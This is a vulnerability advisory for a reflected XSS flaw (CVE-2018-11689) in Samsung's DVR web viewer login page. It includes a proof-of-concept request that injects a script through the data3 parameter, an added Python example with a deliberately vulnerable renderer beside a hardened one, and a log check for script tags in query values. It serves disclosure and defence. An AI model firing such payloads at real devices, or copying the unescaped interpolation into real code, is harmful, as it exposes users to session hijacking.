Samsung Web Viewer For Samsung DVR Cross Site Scripting

2018-06-13T00:00:00
ID PACKETSTORM:148183
Type packetstorm
Reporter Yavuz Atlas
Modified 2018-06-13T00:00:00

Description

I. VULNERABILITY  
-------------------------  
Samsung Web Viewer for Samsung DVR Reflected Cross Site Scripting (XSS)  
  
II. CVE REFERENCE  
-------------------------  
CVE-2018-11689  
  
III. REFERENCES  
-------------------------  
https://vulmon.com/vulnerabilitydetails?qid=CVE-2018-11689  
  
IV. CREDIT  
-------------------------  
Yavuz Atlas - Biznet Bilisim  
http://www.biznet.com.tr/biznet-guvenlik-duyurulari  
  
V. DESCRIPTION  
-------------------------  
Samsung Web Viewer for Samsung DVR devices (Samsung Smart Viewer) is  
vulnerable to reflected cross-site scripting. The data3 parameter of  
/cgi-bin/webviewer_login_page is reflected unescaped into an inline script  
in the login page, which allows remote attackers to inject arbitrary web  
script or HTML.  
  
VI. PROOF OF CONCEPT  
-------------------------  
Request:  
GET /cgi-bin/webviewer_login_page?lang=tu&loginvalue=0&port=0&data3=</script><script>alert(1)</script> HTTP/1.1  
Host: 10.10.10.10  
  
Response:  
HTTP/1.1 200 OK  
X-UA-Compatible: IE=EmulateIE9, requiresActiveX=true  
Content-type: text/html  
Connection: close  
Date: Wed, 23 May 2018 11:14:09 GMT  
Server: lighttpd/1.4.35  
Content-Length: 10797  
function setcookie(){  
var val_rand = Math.random();  
if(is_close_user_session == true)  
document.login_page_submit.close_user_session.value = 1;  
else  
document.login_page_submit.close_user_session.value = 0;  
document.login_page_submit.data1.value =  
data_parser(document.login_page.data1.value);  
document.login_page_submit.data2.value =  
do_encrypt(document.login_page.data2.value);  
document.login_page_submit.data3.value = </script><script>alert(1)</script>;  
document.login_page_submit.data4.value = val_rand;  
document.login_page_submit.submit();  
}  
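As an added example (not code from the advisory, and not Samsung's Web Viewer code): a cut-down renderer that reproduces the reflection shown above, beside a hardened renderer that emits data3 as an encoded JavaScript string literal, plus a check over constructed access-log lines for requests to /cgi-bin/webviewer_login_page whose query values carry script tags. The script template, the log lines and every function name are assumptions; only the path, the parameter name and the proof-of-concept value come from the advisory.

```python
"""Added example, not code from the advisory or from Samsung: how the data3
value ends up inside the page's inline script, what a context-correct
encoding of that value looks like, and a log check for requests carrying
script tags in query parameters of the login page."""
import json
import re
from urllib.parse import parse_qs, urlsplit

# Cut-down version of the setcookie() function shown in the advisory. The
# real CGI binary is not available; the assumption is that it concatenated
# the raw data3 query parameter at the __DATA3__ position.
SCRIPT_TEMPLATE = """<script>
function setcookie(){
  document.login_page_submit.data3.value = __DATA3__;
  document.login_page_submit.submit();
}
</script>"""

# The data3 value from the advisory's proof of concept.
POC_DATA3 = "</script><script>alert(1)</script>"


def render_vulnerable(data3: str) -> str:
    """Raw interpolation: whatever the client sent becomes JavaScript."""
    return SCRIPT_TEMPLATE.replace("__DATA3__", data3)


def js_string_literal(value: str) -> str:
    """Encode value as a JavaScript string literal that is safe inside <script>.

    json.dumps (ensure_ascii=True) escapes quotes, backslashes, control
    characters and all non-ASCII code points, U+2028/U+2029 included.
    The extra replacements keep '<', '>' and '&' out of the output, so the
    HTML tokenizer can never see '</script' or '<!--' inside the literal."""
    literal = json.dumps(value)
    return (literal.replace("<", "\\u003c")
                   .replace(">", "\\u003e")
                   .replace("&", "\\u0026"))


def render_hardened(data3: str) -> str:
    """Same template, value emitted as an encoded string literal."""
    return SCRIPT_TEMPLATE.replace("__DATA3__", js_string_literal(data3))


SCRIPT_CLOSE = re.compile(r"</script", re.IGNORECASE)


def script_close_count(html: str) -> int:
    """Number of '</script' sequences the HTML tokenizer would see. The
    template contributes exactly one; anything more means the injected
    value terminated the script element early."""
    return len(SCRIPT_CLOSE.findall(html))


# Constructed access-log lines in Common Log Format; the first carries the
# proof-of-concept value percent-encoded, the second a benign login request.
SAMPLE_LOG = [
    '10.10.10.5 - - [23/May/2018:11:14:09 +0000] "GET /cgi-bin/webviewer_login_page'
    '?lang=tu&loginvalue=0&port=0&data3=%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E'
    ' HTTP/1.1" 200 10797',
    '10.10.10.6 - - [23/May/2018:11:15:02 +0000] "GET /cgi-bin/webviewer_login_page'
    '?lang=en&loginvalue=0&port=0&data3=0 HTTP/1.1" 200 10797',
    '10.10.10.7 - - [23/May/2018:11:16:40 +0000] "GET /index.html HTTP/1.1" 200 512',
]

REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')
SCRIPT_TAG = re.compile(r"<\s*/?\s*script\b", re.IGNORECASE)


def flag_script_in_query(lines):
    """Return (line_index, parameter) for requests to the login page whose
    percent-decoded query values contain a <script or </script tag."""
    hits = []
    for i, line in enumerate(lines):
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if url.path != "/cgi-bin/webviewer_login_page":
            continue
        # parse_qs percent-decodes the values, so the check sees '</script>'
        for name, values in parse_qs(url.query, keep_blank_values=True).items():
            if any(SCRIPT_TAG.search(v) for v in values):
                hits.append((i, name))
    return hits


if __name__ == "__main__":
    print(render_vulnerable(POC_DATA3))
    print(render_hardened(POC_DATA3))
    print(flag_script_in_query(SAMPLE_LOG))
```

The count of `</script` sequences is the property that matters: the HTML tokenizer ends a script element at the first `</script` it meets regardless of JavaScript quoting, so wrapping the value in quotes in the template, or HTML-entity-encoding it, is not sufficient on its own; the `<` has to be escaped as `\u003c` inside the JavaScript literal. The log check decodes the query before matching, since the value would normally be recorded percent-encoded.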